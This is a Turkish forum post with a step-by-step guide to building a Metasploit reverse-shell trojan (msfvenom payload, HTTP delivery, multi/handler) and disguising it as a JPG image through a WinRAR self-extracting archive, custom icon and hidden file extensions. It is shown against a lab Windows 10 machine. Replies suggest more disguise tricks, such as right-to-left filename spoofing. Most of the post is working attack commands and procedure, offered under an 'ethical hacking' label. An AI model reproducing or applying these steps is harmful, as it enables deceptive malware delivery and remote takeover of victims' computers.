Bu etik bilgisayar korsanlığı projesinde, bir RAT yürütülebilir dosyasını bir görüntünün içinde oluşturma ve gizleme ve bunu bir Windows 10 makinesini hacklemek için kullanma hakkında bir yol gösteriyorum . Güvenli ve kontrollü ortamımda saldırgan olarak Kali Linux VM ve kurban olarak bir Windows 10 VM kullanıyorum.
Uzaktan Erişim Truva Atı (RAT), bir tehdit aktörünün virüs bulaşmış ana bilgisayara erişmesine ve onu kontrol etmesine izin vermek için bir arka kapı uzaktan yönetim kanalı oluşturan kötü amaçlı yazılımdır.
Ayrıca bu proje için WinRAR kullandım .

Bölüm 1

Bir Görsel bulun ve onu PNG veya JPG olarak kaydedin.

İlk olarak, internetten bir resim veya makinenizde kayıtlı bir resim seçin. Ardından, PNG veya JPG olarak kaydedin . Örneğin, lüks bir arabanın resmini kullandım , masaüstüme JPG dosyası olarak kaydettim ve buna Lüks arabam adını verdim . Ardından, WinRAR'ın kurulu olduğundan emin olun .

1*aMc2kpxkDToHFS48JR3EMQ.png


PNG veya JPG resmine sağ tıklayın → Özellikler'e tıklayın → Resmin bir PNG veya JPG dosyası olduğunu onaylayın. Gördüğünüz gibi Lüks arabam bir JPG dosyasıdır . Tamam'ı tıklayın .

1*pq1Xzj4M_kKLSPAPEg6kGg.png


1*zpLft9YOGNxsy8UvWvnC1A.png

Bölüm 2

Görüntüyü bir Simge (ICO) dosyasına dönüştürün.

Dosya türüne bağlı olarak bir PNG veya JPG Simge dönüştürücü kullanacağız. Örneğin, bir JPG dosyası olduğu için Lüks arabam resmi için JPG'den ICO'ya dönüştürücüyü kullanacağız .

1*ZjRi3gS8I3fhfY_8nv2XTQ.png


Dosya Seç → Bilgisayarımdan öğesini tıklayın .

1*Q2g5I-TvIv1OuIEfHC6Y1w.png


Lüks arabam görselini seçin → Aç'a tıklayın .

1*2V1M0cw3ye_HzZinxDSIsA.png


Dönüştür'ü tıklayın .

1*fYLpBGUztp2Xr_zK_diKwA.png


İndir'i tıklayın .

1*GgjbdsfYzsSJOXBejEUOVA.png


İndirilen ICO dosyası sol alt köşede görünür → ICO dosyasını masaüstüne JPG görüntüsünün hemen altına sürükleyip bırakın.
Gördüğünüz gibi, ICO görüntüsü biraz bozuk.

1*7wwf4kFHpUB1O-dAu9GkGA.png

Bölüm 3

Gerçek zamanlı korumayı kapatın.

Devam etmeden önce, yalıtılmış bir ağa geçtim ve gösterim amacıyla, yükün Windows makinesine alınmasıyla ilgili sorunları önlemek için Gerçek zamanlı korumayı kapattım. Bu projenin geri kalanında internet bağlantısı isteğe bağlıdır.

1*Az22pX8jVqfBRGxmbt9ASw.png


4. Bölüm


Yürütülebilir yükü oluşturun ve ayarlayın.

Kali Linux'ta bir Terminal açın ve kök kullanıcı olarak yükü oluşturmak için aşağıdaki komutu yazın:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=10.40.1.110 LPORT=4444 -o ~/payload.exe
1*xAafb7iW7T9isGWGrcXoxw.png

Yük kaydedildikten sonra, cd ~ komutunu kullanarak ana dizine cd yazın ve python3 -m http yazın. sunucu 80, payload.exe dizini ile bağlantı noktası 80'de çalışan web dosya sunucusunu başlatır, böylece kurban makine kötü amaçlı yükü elde edebilir.


cd ~
python3 -m http.sunucu 80

1*IttW19mbvlqXavtLsm4H7A.png

Lüks araba görüntüleri ile Windows kurban makinesinde Microsoft Edge'i açın .
Kali Linux makinesinin IP adresi olan web tarayıcı sekmesine 10.40.1.110 yazın . Enter'a basın .
1*4CQbgfJYXNlOaZ2KnfYtkw.png

Sunucu, istekleri Windows 10 IP adresi olan 10.40.1.111'den alır.
1*yiZYalSWES2VyKvHwXj5Zw.png

HTTP web sunucusu dizinine götürülüyoruz ve en alta doğru kaydırdığınızda msfvenom aracılığıyla oluşturulan payload.exe dosyasını göreceksiniz.
payload.exe'ye tıklayın .

1*oFrRIooYQoqMparIwJdibA.png

1*SgNozluhp_l_Pu_zmsiR6Q.png

Ekranda bir indirme uyarı bildirimi görünmelidir.
Sakla'yı tıklayın .
Payload.exe İndirilenler klasöründe olmalıdır .
1*SUsOA-IsyF9pA0wBI8PRiA.png

1*Ry_Z3BIY7UV0sFT_ghWuQA.png

1*fFIWC868BxwooT8eVJihZQ.png

payload.exe dosyasını masaüstüne sürükleyip bırakın .
1*xc6xUQFjeNxjdRtMzlv-lQ.png

Bölüm 5

RAT'ı Görüntünün içine yerleştirin.

Dosya Gezgini'nde Görünüm sekmesine tıklayın → Dosya adı uzantıları kutusunu işaretleyin . Bu, dosyaların sonunda uzantı türünü gösterecektir.
1*AM5JWdSr1mi-UU4lHZZslw.png

RAT yürütülebilir dosyasını JPG görüntüsünün içine yerleştirmek için payload.exe ve My Luxury car.jpg dosyalarını birlikte vurgulayın ve kutunun içine sağ tıklayın. Ardından Arşive ekle'yi tıklayın .
1*hf1C1JMBfkF3luChOmabXA.png

Genel sekmesinde , Arşiv adı kutusuna RAT dosyasının adını ( LuxuryCar.exe ) yazın . Benzer olmalı ama aynı zamanda diğer dosya adlarından farklı olmalıdır. Bunun bir exe dosyası olduğundan emin olun.


LuxuryCar.exe

Arşiv formatı için ZIP'i kontrol edin → SFX arşivi oluştur kutusunu işaretleyin.
1*Red7GtHnAuokJFiRM10ysw.png

Gelişmiş sekmesini seçin → SFX seçeneklerine tıklayın .
1*e5QVZSzibmlM3dErPTvTZQ.png

Gelişmiş SFX seçeneklerinde , Güncelle sekmesine tıklayın → Dosyaları ayıklayın ve güncelleyin → Tüm dosyaların üzerine yaz'ı işaretleyin .
1*V8ydv8-86HIhbD9O0rqxMw.png

Metin ve simge sekmesine tıklayın → Dosyadan SFX simgesini yüklemek için Gözat'a tıklayın .
1*paW3JLasWo6jS_YAfj5itw.png

My Luxury car.ico dosyasını seçin → Aç'a tıklayın .
1*m2aCZBS4ory6lA94nzlg5Q.png


1*SwEH8ERCioRlibDCDp19qg.png



Modlar sekmesine tıklayın → Tümünü gizle seçeneğine tıklayın .
1*D73IwylciXV1hs0o5ahe3g.png

Ayıklamadan sonra çalıştır kutusuna jpg ve exe resim dosyası adlarını tamamen aynı şekilde yazın .

Lüks arabam.jpg
payload.exe
Tamam'ı tıklayın .
1*N50eyptPf_81olAN4paeQw.png

Tekrar Tamam'ı tıklayın .
1*k-eAvn5vZgJ4thCLrTVIlQ.png

Şimdi, RAT görüntü dosyası LuxuryCar.exe masaüstünde görünür. Bu, bir RAT'ın bir görüntünün içine nasıl yerleştirildiğidir.
1*vag1d-7gLxbjIJ9tma3WSQ.png



6. Bölüm


Metasploit'i kurun.

Bunun işe yaradığını doğrulamak için, sızma testi çerçevesi için çok popüler bir etik hackleme aracı olan Metasploit'i kullanacağız . Bu araç, güvenlik açıklarını, belirlenen açıkları kontrol etmemizi ve eksiksiz bir güvenlik değerlendirmesi yapmamızı sağlar.
Metasploit'i başlatmak için msfconsole komutunu yazın .
1*GxsvCd-igGF-13x-DydCqg.png

msfconsole yüklendikten sonra şunu yazın:


exploit/multi/handler kullan
1*FeWekpo80Js4xbm9hpzxUw.png

Ardından şunu yazın:

yük pencerelerini
/meterpreter/reverse_tcp'yi ayarla
1*od6YOdO2XblsjRu4-aX0JQ.png

Ardından şunu yazın:

seçenekleri göster
1*esPF0STJiUsHzF2uDgaT7g.png

Ana bilgisayar IP adresini (Kali Linux VM) , 10.40.1.110, LHOST'a atamalıyız .
Aşağıdaki komutları yazın:


LHOST 10.40.1.110'u ayarla
seçenekleri göster
1*ORZMtjYXgOBmrATPUmY3iw.png

1*m4jsg0tz1Chp4mczmiQRjw.png

Şimdi LHOST'un
10.40.1.110 IP adresine ayarlandığını görebiliriz.
1*E4c4KJo64K8yFS0KPxvHMQ.png

İstismar etmeye hazırız, bu yüzden sadece exploit yazmanız yeterli . → Enter tuşuna basın .
1*jIJE1ol3SR5KAiCw_x6n6g.png

Sunucu şimdi dinliyor.
1*xtnMG1YxI6V0bFv-mFHmwQ.png

7. Bölüm

RAT'ı görüntünün içinde yürütün.

Windows 10'a geri dönün , Dosya Gezgini'ni açın → Görüntüle'yi tıklayın → Dosya adı uzantılarının işaretini kaldırın .
1*bsymeHyiwtfNMFOii5qEiw.png

Dosya adı uzantıları işaretlenmemişken dosya türlerini artık göremezsiniz . Bu nedenle RAT'ı biraz farklı adlandırdık.
1*KnC2rmTtDoRG0hZkhk0Hcw.png

1*I1eTQECneEVakhJwkG5icg.png


Gizlenmiş dosya türleri ile, LuxuryCar olan RAT exe görüntüsünün adını LuxuryCar.jpg olarak değiştirebiliriz . Şimdi, normal bir jpg dosyası gibi görünüyor, ama aslında bir exe dosyası.
1*9wPn2WPJkyz2pF6GYQTTjQ.png
1*PXf-Vb2toLa61mxeHy0GxQ.png

LuxuryCar.jpg RAT resmine tıklıyoruz ve hiçbir şey olmuyor gibi görünüyor.
1*bZbRMCThVGKGgyIfe_UZOA.png

Komut İstemi'ni açın ve ipconfig yazın. Windows 10 IP adresi 10.40.1.111'dir .
1*QjSe7aUuMZuD3KSJa3cG_w.png

Kali Linux'ta Metasploit Çerçevesine geri dönersek , bir şeylerin olduğunu görebiliriz ve şimdi Kali IP adresi 10.40.110'dan Windows IP adresi 10.40.1.111'e açık bir Meterpreter oturumumuz var .
1*lmm1TpvpnPXRiGPXU8l22A.png

ipconfig yazın ve Windows 10 IP adresini görebiliriz. 10.40.1.111.
1*EQ9iy6rdIQ9BwjOpX5oHTg.png

Shell → Enter → whoami yazın .
Windows 10 makinesinin yöneticisiyim .
1*Z39Y9K-eVLvqZfqZJr5m4A.png


Sonuç olarak, bir RAT bir görüntünün içine bu şekilde gizlenir ve bir Windows sistemini hacklemek için kullanılır. Bu basit ve bilgilendirici bir süreçtir.


Kaynak:Cybertech Maven
eline saglik . file exstensionu acik olan hedef uzantinin .exe oldugunu gormezmi?
 

alexandre20

Katılımcı Üye
13 Tem 2022
926
728
exe'nin iconunu Resource Hacker gibi bir program ile de değiştirebilirdiniz. winRARa gerek yok. Ayrıca dosya uzantısı hala .exe olduğu için "resim ile sızma" gibi bir durum yok. Eğer kullanıcı kör değilse hemen yanında "Uygulama" yazısını görecektir. Uzantıları gizle ayarı kapalıysa da direkt .exe uzantısını görecektir. RTL sembolü ile ismi sağdan sola yazdırıp sondaki uzantıyı .jpg olarak göstermek de mümkün ama konudan anladığım kadarıyla zararlı yazılımlar hakkında detaylı bilginiz yok. bu yüzden konuda bahsedilmemiş olması normal.
 

tamam ağa

Uzman üye
7 Haz 2023
1,533
876
exe'nin iconunu Resource Hacker gibi bir program ile de değiştirebilirdiniz. winRARa gerek yok. Ayrıca dosya uzantısı hala .exe olduğu için "resim ile sızma" gibi bir durum yok. Eğer kullanıcı kör değilse hemen yanında "Uygulama" yazısını görecektir. Uzantıları gizle ayarı kapalıysa da direkt .exe uzantısını görecektir. RTL sembolü ile ismi sağdan sola yazdırıp sondaki uzantıyı .jpg olarak göstermek de mümkün ama konudan anladığım kadarıyla zararlı yazılımlar hakkında detaylı bilginiz yok. bu yüzden konuda bahsedilmemiş olması normal.
buna ek olarak charset'in ayarları ile oynayıp .exe yerine .jpg gösterelebilir.
ama özellikler bölümünden yine .exe olarak gözükecektir.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.